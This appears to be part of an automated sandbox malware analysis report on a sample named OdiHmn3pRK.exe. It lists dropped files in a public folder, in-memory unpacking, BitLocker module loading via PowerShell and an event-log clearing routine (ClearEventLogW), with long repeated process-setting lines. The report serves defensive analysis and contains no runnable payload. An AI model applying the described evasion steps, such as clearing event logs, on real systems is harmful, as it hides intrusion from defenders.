Source: Binary string: \??\C:\Windows\System.Management.Automation.pdby source: powershell.exe, 00000012.00000002.2580579399.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2580579399.0000000002D51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb2 source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \YSS\Release\Microsoft.WindowsAppRuntime.Bootstrap.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2584651859.000000000738E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2589252311.00000000084EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2589479854.000000000850F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdbI source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeUnpacked PE file: 3.2.kwpswnsserver.exe.4270000.6.unpack
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
Source: Microsoft.WindowsAppRuntime.Bootstrap.dll.0.drStatic PE information: section name: .00cfg
Source: linit-v4.1.6.exe.0.drStatic PE information: section name: .fptable
Source: backup.dll.3.drStatic PE information: section name: .00cfg
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00411C20 push eax; ret 0_2_00411C4E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B1D95 push ecx; ret 3_2_004B1DA8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04292470 push ebp; retf 3_2_04292474
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04292450 push ebp; retf 3_2_04292474
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0429A0B8 push eax; ret 3_2_0429A119
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0429A168 push eax; ret 3_2_0429A119
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04284345 push ecx; ret 3_2_04284358
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C87F610 push eax; mov dword ptr [esp], 8007000Eh3_2_6C87F614
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88FC63 push esi; ret 3_2_6C88FC65
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C89F5ED push ecx; ret 3_2_6C89F600
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile created: C:\Users\user\AppData\Local\Temp\backup.exeJump to dropped file
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeFile created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile created: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeFile created: C:\Users\Public\Bilite\linit-v4.1.6.exeJump to dropped file
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeFile created: C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8A2F1D GetParent,IsIconic,GetParent,__EH_prolog3,3_2_6C8A2F1D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88E80E IsIconic,3_2_6C88E80E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8B8664 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,3_2_6C8B8664
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C893184 IsWindowVisible,IsIconic,3_2_6C893184
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88717F IsIconic,IsWindowVisible,3_2_6C88717F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_0427B3C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B0DD1 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004B0DD1
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
